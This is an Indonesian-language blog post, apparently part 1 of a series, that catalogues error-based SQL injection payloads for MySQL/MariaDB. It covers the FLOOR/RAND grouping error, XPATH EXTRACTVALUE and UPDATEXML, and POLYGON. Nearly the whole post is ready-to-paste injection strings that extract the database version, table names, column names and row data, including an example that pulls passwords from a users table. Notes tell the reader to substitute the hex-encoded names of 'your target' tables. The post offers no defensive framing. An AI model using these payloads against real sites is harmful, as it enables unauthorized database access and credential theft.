Error/Double | SQL Injection Part 1

Error/Double | SQL Injection Part 1

Nelo.F4 - Error/Double SQL Injection Part 1. Seperti biasa saya luruskan kembali bahwasanya disini saya bukan ahli dalam sql injection dan bukan ahli dalam bidang hacking. saya hanya mencoba mempelajari apa yang saya tahu dan saya paham, semua payload yang saya berikan dibawah saya dapat dari hackbar mod by pesantren cyber army. ada 2 part dalam Error/Double payload ini. payload ini guananya untuk apa? untuk inject mysql mariaDB! ada juga server yang lain tetapi sangat di sayangkan saya belum pernah mencoba ke server yang lain. 

The contents of all of these articles
  • Error Based
  • XPATH EXTRACTVALUE
  • XPATH UPDATEXML
  • POLYGON / MULTIPIONT

Error Based  


Get Version
+OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1
Get Database
+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(DATABASE()+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
Get Tables 
+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
Get Column
+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x5448495320495320594f555220434f4c554d4e53+AND+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
NOTE: 0x5448495320495320594f555220434f4c554d4e53 (change this for your column and change again to hex)
Get Data
+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(COLUMN NAME)+AS+CHAR),0x7e))+FROM+TABLE NAME+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
Example: +AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(password)+AS+CHAR),0x7e))+FROM+users+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)


XPATH EXTRACTVALUE
Get Version
 and extractvalue(0x0a,concat(0x0a,(select version())))
Get Tables
and extractvalue(0x0a,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)))

Get Column
 and extractvalue(0x0a,concat(0x0a,(select column_name from information_schema.columns where table_schema=DATABASE() and table_name=0x7461626c655f6e616d65 limit 0,1)))
NOTE: Change 0x7461626c655f6e616d65 this hex, to tables name your target and change to be hex again.
Get Data
and extractvalue(0x0a,concat(0x0a,(select concat(username,password) from Table Name limit 0,1)))
NOTE: Change Table Name this name table to your target table name, and user,password to your target column


XPATH UPDATEXML
Get Version
and updatexml(null,concat(0x0a,(select version())),null)
Get Tables
and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),null)
Get Column
  and updatexml(null,concat(0x0a,(select column_name from information_schema.columns where table_schema=DATABASE() and table_name=0x596f7572205461626c65204e616d65 limit 0,1)),null)
NOTE: Change 0x596f7572205461626c65204e616d65 this hex, to tables name your target and change to be hex again.
Get Data
and updatexml(null,concat(0x0a,(select concat(yourcolumn,column) from yourtable limit 0,1)),null)
NOTE: Change this yourcolumn,column and change this again yourtable

POLYGON / MULTIPIONT
Get Version
+POLYGON((Select*from(Select*from(Select+@@version ``)y)x))

Get Tables
+POLYGON((select*from(select*from(select+group_concat(table_name+separator+0x3c62723e)+from+information_schema.tables+where+table_schema=database())f)x))


okay until here, next update part 2 

See u to part 2 - Nelo.F4

Belum ada Komentar untuk "Error/Double | SQL Injection Part 1"

Posting Komentar

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel